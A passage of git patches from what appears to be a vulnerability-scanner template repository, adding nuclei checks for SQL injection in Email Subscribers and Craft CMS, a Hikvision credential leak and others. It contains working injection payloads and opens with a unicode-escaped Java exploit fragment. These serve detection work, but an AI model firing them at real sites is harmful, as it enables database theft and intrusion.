\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&modelName=test matchers-condition: and matchers: From d67ca2233ec69211ed1a4c25f275b417225c6560 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 13:08:28 +0530 Subject: [PATCH 1580/1841] Create CVE-2024-4295.yaml --- http/cves/2024/CVE-2024-4295.yaml | 52 +++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4295.yaml diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml new file mode 100644 index 0000000000..424971ff76 --- /dev/null +++ b/http/cves/2024/CVE-2024-4295.yaml @@ -0,0 +1,52 @@ +id: CVE-2024-4295 + +info: + name: Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + Email Subscribers by Icegram Express <= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter. + remediation: Fixed in 5.7.21 + impact: This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve + - https://github.com/cve-2024/CVE-2024-4295-Poc + - https://github.com/truonghuuphuc/CVE-2024-4295-Poc + - https://nvd.nist.gov/vuln/detail/CVE-2024-4295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4295 + cwe-id: CWE-89 + epss-score: 0.00091 + epss-percentile: 0.39447 + cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* + metadata: + vendor: icegram + product: email_subscribers_\&_newsletters + framework: wordpress + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/email-subscribers/" + fofa-query: body="/wp-content/plugins/email-subscribers/" + tags: cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli + +variables: + contact_id: "{{contact_id}}" + email: "{{email}}" + rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(3)"],"action":"subscribe"}' + +http: + - raw: + - | + @timeout: 20s + GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'contains(body, "You have been successfully subscribed")' + condition: and From 3934b2b1bc98e475a15c4624383ab39b3bd22ba9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 14:08:52 +0530 Subject: [PATCH 1581/1841] Update generic-xxe.yaml --- dast/vulnerabilities/xxe/generic-xxe.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index 54b53b1ee4..5992137d30 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -1,8 +1,8 @@ id: generic-xxe info: - name: Generic XML external entity (XXE) - author: pwnhxl, AmirHossein Raeisi + name: Generic XML External Entity - (XXE) + author: pwnhxl,Ahsraeisi severity: medium reference: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py From 8c57d4b85feefa50629428b6abecf8ef6aa0f53d Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Wed, 24 Jul 2024 12:12:53 +0330 Subject: [PATCH 1582/1841] Update generic-xxe.yaml --- dast/vulnerabilities/xxe/generic-xxe.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index 5992137d30..ecd44c93e3 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -2,7 +2,7 @@ id: generic-xxe info: name: Generic XML External Entity - (XXE) - author: pwnhxl,Ahsraeisi + author: pwnhxl,AmirHossein Raeisi severity: medium reference: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py From 4169491c6942937fddb5cd584866d6a720289fdb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 14:18:47 +0530 Subject: [PATCH 1583/1841] Create CVE-2024-37843.yaml --- http/cves/2024/CVE-2024-37843.yaml | 58 ++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/cves/2024/CVE-2024-37843.yaml diff --git a/http/cves/2024/CVE-2024-37843.yaml b/http/cves/2024/CVE-2024-37843.yaml new file mode 100644 index 0000000000..adb13457ed --- /dev/null +++ b/http/cves/2024/CVE-2024-37843.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-37843 + +info: + name: Craft CMS <=v3.7.31 - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint. + reference: + - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql + - https://github.com/gsmith257-cyber/CVE-2024-37843-POC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-37843 + cwe-id: CWE-89 + epss-score: 0.00091 + epss-percentile: 0.39447 + cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* + metadata: + vendor: craftcms + product: craft_cms + shodan-query: + - cpe:"cpe:2.3:a:craftcms:craft_cms" + - http.html:"craftcms" + - http.favicon.hash:"-47932290" + - "X-Powered-By: Craft CMS" + fofa-query: + - body=craftcms + - icon_hash=-47932290 + publicwww-query: craftcms + tags: cve,cve2024,craftcms,sqli + +variables: + matcher: "{{rand_base(4)}}" + +http: + - raw: + - | + POST /api/ HTTP/1.1 + Host: {{Hostname}} + Content-Type:application/json + + {"query":"query IntrospectionQuery {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"} + + skip-variables-check: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "General error: 1105 XPATH syntax error: '\\n{{matcher}}" + condition: and + + - type: word + part: content_type + words: + - "application/json" From ae7003beade96391f98b91807af715deea241858 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 14:21:57 +0530 Subject: [PATCH 1584/1841] fix error --- http/cves/2024/CVE-2024-37843.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-37843.yaml b/http/cves/2024/CVE-2024-37843.yaml index adb13457ed..6597faf190 100644 --- a/http/cves/2024/CVE-2024-37843.yaml +++ b/http/cves/2024/CVE-2024-37843.yaml @@ -32,7 +32,7 @@ info: tags: cve,cve2024,craftcms,sqli variables: - matcher: "{{rand_base(4)}}" + matcher: "{{rand_base(4)}}" http: - raw: From 558f41333fe78f74907ab291cd6f6a6eea8d2671 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 14:54:25 +0530 Subject: [PATCH 1585/1841] minor-update --- http/cves/2024/CVE-2024-39250.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-39250.yaml b/http/cves/2024/CVE-2024-39250.yaml index beb9189b88..5df77304a2 100644 --- a/http/cves/2024/CVE-2024-39250.yaml +++ b/http/cves/2024/CVE-2024-39250.yaml @@ -15,10 +15,11 @@ info: epss-score: 0.00043 epss-percentile: 0.09359 metadata: - vendor: EfroTech - product: Timetrax + vendor: efroTech + product: timetrax fofa-query: icon_hash="-661694518" tags: cve,cve2024,sqli,timetrax + flow: http(1) && http(2) http: From ef043e20b881205e556592a5d5f7116e8ea3dea5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 15:12:22 +0530 Subject: [PATCH 1586/1841] Update 7777botnet.yaml --- network/c2/7777botnet.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/c2/7777botnet.yaml b/network/c2/7777botnet.yaml index e215fa2c2d..fce490d510 100644 --- a/network/c2/7777botnet.yaml +++ b/network/c2/7777botnet.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - shodan-query: product:'hash:1357418825' + shodan-query: 'hash:1357418825' tags: network,c2,ir,osint,cti,darktrack,botnet,tcp tcp: From 02762553d564fc3e0b5513fd57bd48f3d7271781 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 16:18:07 +0530 Subject: [PATCH 1587/1841] Update and rename hikvision-iSecure-info-leak.yaml to hikvision-ismp-info-leak.yaml --- .../hikvision-iSecure-info-leak.yaml | 33 ----------------- .../hikvision/hikvision-ismp-info-leak.yaml | 35 +++++++++++++++++++ 2 files changed, 35 insertions(+), 33 deletions(-) delete mode 100644 http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml create mode 100644 http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml diff --git a/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml deleted file mode 100644 index aadd8d4415..0000000000 --- a/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: hikvision-iSecure-info-leak - -info: - name: zongheanfang-info-leak - author: adeljck - severity: critical - description: | - Hikvision iSecure Center /portal/conf/config.properties can get encrypted redis password,if server expose redis port.people can get a reverse shell with redis. - reference: - - https://github.com/adeljck/Hikvision_Info_Leak - metadata: - verified: true - max-request: 2 - fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台",body="/portal/skin/ifar/blue/skin.css" - tags: infoleak,iot,hikvision -http: - - method: GET - path: - - "{{BaseURL}}/portal/conf/config.properties" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 - Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 - Accept-Encoding: gzip, deflate - Sec-Fetch-Dest: empty - Sec-Fetch-Mode: cors - Sec-Fetch-Site: same-origin - Te: trailers - Connection: close - - matchers: - - type: word - words: - - 'password' \ No newline at end of file diff --git a/http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml b/http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml new file mode 100644 index 0000000000..671e54881d --- /dev/null +++ b/http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml @@ -0,0 +1,35 @@ +id: hikvision-isecure-info-leak + +info: + name: HIKVISION iSecure Center - Information Leak + author: adeljck + severity: high + description: | + HIKVISION iSecure Center comprehensive security management platform is an "integrated" and "intelligent" platform. By accessing equipment such as video surveillance, all-in-one card, parking lot, alarm detection and other systems, Hikvision comprehensive security management platform information exists Information leakage (internal network centralized account password) vulnerability can be decrypted through decryption software, username and password. + reference: + - https://github.com/adeljck/Hikvision_Info_Leak + - https://github.com/wy876/POC/blob/main/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md + metadata: + verified: true + max-request: 1 + fofa-query: app="HIKVISION-综合安防管理平台" + tags: infoleak,iot,hikvision + +http: + - method: GET + path: + - "{{BaseURL}}/portal/conf/config.properties" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '@bic' + - 'username' + - 'password' + condition: and + + - type: status + status: + - 200 From 1e8a6a62bec2e6f61d02f104d0528db548ccf227 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 16:18:31 +0530 Subject: [PATCH 1588/1841] Rename hikvision-ismp-info-leak.yaml to hikvision-isecure-info-leak.yaml --- ...ision-ismp-info-leak.yaml => hikvision-isecure-info-leak.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/hikvision/{hikvision-ismp-info-leak.yaml => hikvision-isecure-info-leak.yaml} (100%) diff --git a/http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml b/http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml similarity index 100% rename from http/vulnerabilities/hikvision/hikvision-ismp-info-leak.yaml rename to http/vulnerabilities/hikvision/hikvision-isecure-info-leak.yaml From a0e4cd273b8a422d55bbe4e3b3109de18207fdc1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 24 Jul 2024 16:41:46 +0530 Subject: [PATCH 1589/1841] TFTP Service minor - update --- javascript/udp/detection/tftp-detect.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 4dcf989e3f..e0505d53be 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -12,9 +12,7 @@ info: shodan-query: "port:69" tags: js,tftp,udp,network javascript: - - pre-condition: | - isPortOpen(Host,Port); - code: | + - code: | let packet = bytes.NewBuffer(); let message = "1.txt" let data = message; @@ -33,4 +31,5 @@ javascript: - type: word words: - "Unknown transfer ID" -# digest: 4a0a00473045022100c512c1a23c479681469c4b6a1e1e7a5740dfee043f58cb2a1d79767822cbb32802203dfa42884afa515fb2ac6dd0e0075422bc1f3ece618c6538164c8b9b09062e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + case-insensitive: true +# digest: 4a0a00473045022100c512c1a23c479681469c4b6a1e1e7a5740dfee043f58cb2a1d79767822cbb32802203dfa42884afa515fb2ac6dd0e0075422bc1f3ece618c6538164c8b9b09062e46:922c64590222798bb761d5b6d8e72950 From fdf4ecc3dfc6d31abee88cc568ff632c5879fba6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 16:44:28 +0530 Subject: [PATCH 1590/1841] fix trailspace --- javascript/udp/detection/tftp-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index e0505d53be..0c48085b27 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -31,5 +31,5 @@ javascript: - type: word words: - "Unknown transfer ID" - case-insensitive: true + case-insensitive: true # digest: 4a0a00473045022100c512c1a23c479681469c4b6a1e1e7a5740dfee043f58cb2a1d79767822cbb32802203dfa42884afa515fb2ac6dd0e0075422bc1f3ece618c6538164c8b9b09062e46:922c64590222798bb761d5b6d8e72950 From f8b6e24828ac51c6f2e846d6bda298f337c2bc5a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Jul 2024 11:21:25 +0000 Subject: [PATCH 1592/1841] Auto Generated Templates Checksum [Wed Jul 24 11:21:25 UTC 2024] :robot: --- templates-checksum.txt | 438 ++++++++++++++++++++--------------------- 1 file changed, 219 insertions(+), 219 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 31b42df2e4..77f4a48b1e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -245,7 +245,7 @@ dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d58 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 dast/vulnerabilities/ssrf/blind-ssrf.yaml:062d570ba1c6f5d5a382875b296b337c14f07aee -dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 +dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f @@ -748,7 +748,7 @@ helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6 helpers/wordpress/plugins/astra-sites.txt:c2dd4309068e440533d1b8b76fb6680a1324df74 helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 -helpers/wordpress/plugins/backwpup.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd +helpers/wordpress/plugins/backwpup.txt:9301d028023f0b8d0d7bac4531bbd63703d358da helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 @@ -786,18 +786,18 @@ helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:68c9b7f7107e58a492 helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f -helpers/wordpress/plugins/elementor.txt:d9abe4c43d66f95b79773f980a97bfd3f2148920 +helpers/wordpress/plugins/easy-wp-smtp.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 +helpers/wordpress/plugins/elementor.txt:77bbdb08c8386b1db4a688e2f9a96dd897ebc11f helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:778d773431944dd657af2fde3406d17be92f9cfe helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa -helpers/wordpress/plugins/facebook-for-woocommerce.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 +helpers/wordpress/plugins/facebook-for-woocommerce.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce -helpers/wordpress/plugins/fluent-smtp.txt:66a3a22f1993f1dc323109ac736fb1fa2c02e37f +helpers/wordpress/plugins/fluent-smtp.txt:730bd727b3c4db45a22275182f1cbd51573c4ffe helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd38 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 @@ -832,7 +832,7 @@ helpers/wordpress/plugins/jetpack-boost.txt:0378155bec7f85b13304474a2e6dc6c77976 helpers/wordpress/plugins/jetpack.txt:60a854f8bf5e45303554786e4d93e54911b7eb31 helpers/wordpress/plugins/kadence-blocks.txt:b1a299a05adb09d8c3884ba7ed81e69dd09369d8 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d -helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 +helpers/wordpress/plugins/leadin.txt:839a647433a9f8e27202a54029166cf00ce88b97 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4a68a369b09b39005e13232e5dfd62ba1526b55d helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:03c10c50990743199cc887aaacd3f88a0a0a026e @@ -841,7 +841,7 @@ helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:6f8941ad5d1dfeb1e4d4a276b9ad1dbce8a7cc0d -helpers/wordpress/plugins/mailpoet.txt:970defc3a5b51878c279d9b687b808ec0765df77 +helpers/wordpress/plugins/mailpoet.txt:5a69b31dc00045596a99a27b106a7326f6d44297 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:218d96849acd4f3914538408fbb4a3dca66ff25c helpers/wordpress/plugins/malcare-security.txt:eb5ffc0342cb0113a96a05c48dd1c79f3aa9174b @@ -863,15 +863,15 @@ helpers/wordpress/plugins/password-protected.txt:b74c052eec677c340bd7f99d94e1557 helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a60c helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pinterest-for-woocommerce.txt:024e6d4f5d6db7d7e0b074cb50b41ad492ddb8c3 +helpers/wordpress/plugins/pinterest-for-woocommerce.txt:b43a7e746239a620873eb1cafebc00275628d25d helpers/wordpress/plugins/pixelyoursite.txt:eed99d45d85b51d535a8ee871f49622ae2ab39c6 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d helpers/wordpress/plugins/post-smtp.txt:aecdd619817528f6e7764e982d8df1aafa8a7175 helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/premium-addons-for-elementor.txt:d45042d6a26130a25d35761ed77b4b0bc720ab44 -helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:7db99b25d0e8a75cbf61dc7a01d2b96a266ef77b +helpers/wordpress/plugins/pretty-link.txt:bd97de79166e7cff400d017959304a14efc7d502 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e @@ -890,7 +890,7 @@ helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076 helpers/wordpress/plugins/siteguard.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e helpers/wordpress/plugins/siteorigin-panels.txt:bc7fa19bc30f09a5461e289a3ac43834d448a889 helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 -helpers/wordpress/plugins/so-widgets-bundle.txt:6d445f8f926ce0b81a2d46eb8ce60af388326266 +helpers/wordpress/plugins/so-widgets-bundle.txt:e358826da69ef981bbf7a05476147a4c7d2dfc5e helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a1231facbb4b8314300cb531105cd765f90c95f1 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166bfaf866032133ae1ec337f07572 @@ -900,7 +900,7 @@ helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23 helpers/wordpress/plugins/tablepress.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/the-events-calendar.txt:18550ee15e4dfc3c7876ce760f9fc97cb5a54592 +helpers/wordpress/plugins/the-events-calendar.txt:056a2f3ea154b15b7198157705ee170cc88da924 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa @@ -929,7 +929,7 @@ helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 -helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa 